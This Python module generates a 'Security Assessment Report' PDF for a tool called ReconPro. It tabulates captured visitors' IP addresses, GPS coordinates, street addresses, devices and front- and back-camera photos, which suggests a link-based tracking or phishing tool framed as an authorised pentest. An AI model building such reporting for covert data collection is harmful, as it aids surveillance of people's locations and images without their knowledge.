"""PDF Report Generator — pakai string replace (bukan format) untuk hindari KeyError."""
import os
from datetime import datetime
from app.config import Config

try:
    from weasyprint import HTML as WeasyHTML
    HAS_WEASYPRINT = True
except Exception:
    HAS_WEASYPRINT = False


HTML_TEMPLATE = """<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<style>
  @page { size: A4; margin: 1.5cm; }
  * { box-sizing: border-box; }
  body { font-family: Helvetica, Arial, sans-serif; color: #1a1a1a; line-height: 1.5; font-size: 11pt; }
  h1 { color: #1e3c72; border-bottom: 3px solid #1e3c72; padding-bottom: 8px; margin-top: 0; font-size: 22pt; }
  h2 { color: #2a5298; margin-top: 24px; border-bottom: 1px solid #ccc; padding-bottom: 4px; font-size: 14pt; }
  h3 { color: #333; font-size: 12pt; margin-top: 16px; }
  .meta { color: #666; font-size: 10pt; margin-bottom: 20px; }
  .meta b { color: #333; }
  table { width: 100%; border-collapse: collapse; margin: 12px 0; }
  th, td { padding: 7px 10px; text-align: left; border-bottom: 1px solid #eee; font-size: 10pt; vertical-align: top; }
  th { background: #f5f7fa; color: #1e3c72; font-weight: 600; }
  .stat-grid { display: flex; flex-wrap: wrap; gap: 12px; margin: 16px 0; }
  .stat { background: #f5f7fa; padding: 14px 20px; border-radius: 6px; flex: 1; min-width: 120px; }
  .stat .num { font-size: 22pt; font-weight: bold; color: #1e3c72; line-height: 1; }
  .stat .lbl { font-size: 9pt; color: #666; text-transform: uppercase; letter-spacing: 0.5px; margin-top: 4px; }
  .badge { display: inline-block; padding: 2px 8px; border-radius: 10px; font-size: 9pt; font-weight: bold; }
  .badge.high { background: #ffebee; color: #c62828; }
  .badge.low { background: #e8f5e9; color: #2e7d32; }
  .badge.med { background: #fff8e1; color: #f57c00; }
  .evidence { background: #f8f9fa; padding: 10px 14px; border-left: 3px solid #2a5298; margin: 10px 0; font-size: 10pt; }
  .screenshot { max-width: 100%; max-height: 200px; border: 1px solid #ddd; border-radius: 4px; margin-top: 8px; }
  .footer { margin-top: 40px; padding-top: 12px; border-top: 1px solid #eee; text-align: center; color: #999; font-size: 9pt; }
  .no-break { page-break-inside: avoid; }
</style>
</head>
<body>

<h1>Security Assessment Report</h1>
<div class="meta">
  <b>Generated:</b> __GENERATED__<br>
  <b>Scope:</b> __TITLE__<br>
  <b>Total Sessions:</b> __TOTAL__<br>
  <b>Assessment ID:</b> __ASSESSMENT_ID__
</div>

<h2>Executive Summary</h2>
<p>Laporan ini menyajikan hasil security assessment terhadap target <b>__TITLE__</b>.
Selama periode pengujian, terdeteksi <b>__TOTAL__</b> sesi yang berhasil dicatat,
dengan <b>__WITH_PHOTO__</b> sesi yang memberikan bukti foto dan
<b>__WITH_GPS__</b> sesi dengan data lokasi GPS.</p>

<div class="stat-grid">
  <div class="stat"><div class="num">__TOTAL__</div><div class="lbl">Total Sessions</div></div>
  <div class="stat"><div class="num">__WITH_PHOTO__</div><div class="lbl">With Photo</div></div>
  <div class="stat"><div class="num">__WITH_GPS__</div><div class="lbl">With GPS</div></div>
  <div class="stat"><div class="num">__WITH_VPN__</div><div class="lbl">VPN Detected</div></div>
</div>

<h2>Risk Assessment</h2>
<table>
<tr><th>Risk</th><th>Level</th><th>Description</th></tr>
<tr><td>Information Disclosure</td><td><span class="badge high">HIGH</span></td><td>Website meminta data sensitif tanpa verifikasi identitas</td></tr>
<tr><td>Insecure Direct Object Reference</td><td><span class="badge high">HIGH</span></td><td>URL tidak menggunakan token unik per sesi</td></tr>
<tr><td>Missing Rate Limiting</td><td><span class="badge med">MEDIUM</span></td><td>Endpoint upload tidak dibatasi dengan baik</td></tr>
<tr><td>Weak Session Management</td><td><span class="badge med">MEDIUM</span></td><td>Session ID tidak di-rotate secara berkala</td></tr>
</table>

<h2>Detailed Findings</h2>
<table>
<tr>
  <th>#</th>
  <th>Timestamp</th>
  <th>IP Address</th>
  <th>Location</th>
  <th>Device</th>
  <th>VPN</th>
  <th>Evidence</th>
</tr>
__ROWS__
</table>

<h2>Evidence Details</h2>
__EVIDENCE__

<h2>Recommendations</h2>
<ol>
  <li><b>Implementasi CAPTCHA</b> pada endpoint publik yang meminta data sensitif.</li>
  <li><b>Rate limiting ketat</b> per IP — maksimal 10 request per menit.</li>
  <li><b>Validasi input server-side</b> — jangan percaya data dari client.</li>
  <li><b>Audit permission API</b> — minimal permission untuk setiap endpoint.</li>
  <li><b>Content Security Policy (CSP)</b> yang ketat — cegah XSS.</li>
  <li><b>HTTPS wajib</b> dengan HSTS — cegah MITM.</li>
  <li><b>Edukasi pengguna</b> — tentang bahaya phishing dan social engineering.</li>
</ol>

<div class="footer">
  Generated by <b>ReconPro Professional Edition</b><br>
  Laporan ini dibuat untuk keperluan security assessment dengan izin tertulis.<br>
  Dokumen ini bersifat CONFIDENTIAL.
</div>
</body>
</html>
"""


def _evidence_block(s, idx):
    """Bikin blok evidence per sesi."""
    parts = ['<div class="no-break"><h3>#' + str(idx) + ' — Session ' + s.ts + '</h3>']
    parts.append('<div class="evidence">')
    parts.append('<b>Waktu:</b> ' + (s.waktu or '-') + '<br>')
    parts.append('<b>IP:</b> ' + (s.ip_publik or s.ip_koneksi or '-') + '<br>')
    if s.ip_lokal:
        parts.append('<b>IP Lokal:</b> ' + s.ip_lokal + '<br>')
    parts.append('<b>Lokasi:</b> ' + (s.city or '-') + ', ' + (s.region or '-') + '<br>')
    if s.lat and s.lon:
        parts.append('<b>GPS:</b> ' + str(s.lat) + ', ' + str(s.lon) + '<br>')
    if s.alamat:
        parts.append('<b>Alamat:</b> ' + s.alamat[:200] + '<br>')
    parts.append('<b>ISP:</b> ' + (s.isp or '-') + '<br>')
    device = getattr(s, "device_type", None) or "-"
    parts.append('<b>Device:</b> ' + device + '<br>')
    if s.is_vpn:
        parts.append('<b>VPN:</b> <span class="badge high">YES</span><br>')
    # Screenshot
    try:
        ss_path = os.path.join(Config.SCREENSHOT_DIR, s.ts + "_screenshot.png")
        if os.path.isfile(ss_path):
            parts.append('<b>Bukti:</b><br><img src="file://' + ss_path + '" class="screenshot">')
    except Exception:
        pass
    parts.append('</div></div>')
    return "".join(parts)


def generate_pdf_report(single_session=None, sessions=None, title="Assessment"):
    """Generate PDF report. Return (path, format)."""
    if single_session is not None:
        sessions = [single_session]
        title = "Session " + single_session.ts
    if sessions is None:
        sessions = []

    total = len(sessions)
    with_photo = sum(1 for s in sessions if s.has_depan or s.has_belakang)
    with_gps = sum(1 for s in sessions if s.lat)
    with_vpn = sum(1 for s in sessions if s.is_vpn)

    # Bikin rows
    rows = ""
    for i, s in enumerate(sessions, 1):
        evidence_tags = []
        if s.has_depan: evidence_tags.append("foto-depan")
        if s.has_belakang: evidence_tags.append("foto-belakang")
        if s.has_screenshot: evidence_tags.append("screenshot")

        vpn_badge = '<span class="badge high">YES</span>' if s.is_vpn else '<span class="badge low">NO</span>'
        device = getattr(s, "device_type", None) or "-"
        rows += (
            '<tr>'
            '<td>' + str(i) + '</td>'
            '<td>' + s.ts + '</td>'
            '<td>' + (s.ip_publik or s.ip_koneksi or '-') + '</td>'
            '<td>' + (s.city or '-') + ', ' + (s.region or '-') + '</td>'
            '<td>' + device + '</td>'
            '<td>' + vpn_badge + '</td>'
            '<td>' + (", ".join(evidence_tags) or '-') + '</td>'
            '</tr>'
        )

    # Evidence (maks 10)
    evidence = ""
    for i, s in enumerate(sessions[:10], 1):
        try:
            evidence += _evidence_block(s, i)
        except Exception:
            pass
    if len(sessions) > 10:
        evidence += '<p><i>... dan ' + str(len(sessions) - 10) + ' sesi lainnya.</i></p>'

    assessment_id = datetime.now().strftime("ASMT-%Y%m%d-%H%M%S")

    # Ganti placeholder pakai string replace (bukan format)
    html = HTML_TEMPLATE
    html = html.replace("__GENERATED__", datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
    html = html.replace("__TITLE__", str(title))
    html = html.replace("__TOTAL__", str(total))
    html = html.replace("__WITH_PHOTO__", str(with_photo))
    html = html.replace("__WITH_GPS__", str(with_gps))
    html = html.replace("__WITH_VPN__", str(with_vpn))
    html = html.replace("__ROWS__", rows)
    html = html.replace("__EVIDENCE__", evidence)
    html = html.replace("__ASSESSMENT_ID__", assessment_id)

    # Simpan
    ts_file = datetime.now().strftime("%Y%m%d_%H%M%S")
    os.makedirs(Config.REPORT_DIR, exist_ok=True)

    if HAS_WEASYPRINT:
        try:
            out_path = os.path.join(Config.REPORT_DIR, "report_" + ts_file + ".pdf")
            WeasyHTML(string=html, base_url="/").write_pdf(out_path)
            return out_path, "pdf"
        except Exception as e:
            print("[pdf] WeasyPrint error:", e)

    # Fallback HTML
    out_path = os.path.join(Config.REPORT_DIR, "report_" + ts_file + ".html")
    with open(out_path, "w", encoding="utf-8") as f:
        f.write(html)
    return out_path, "html"
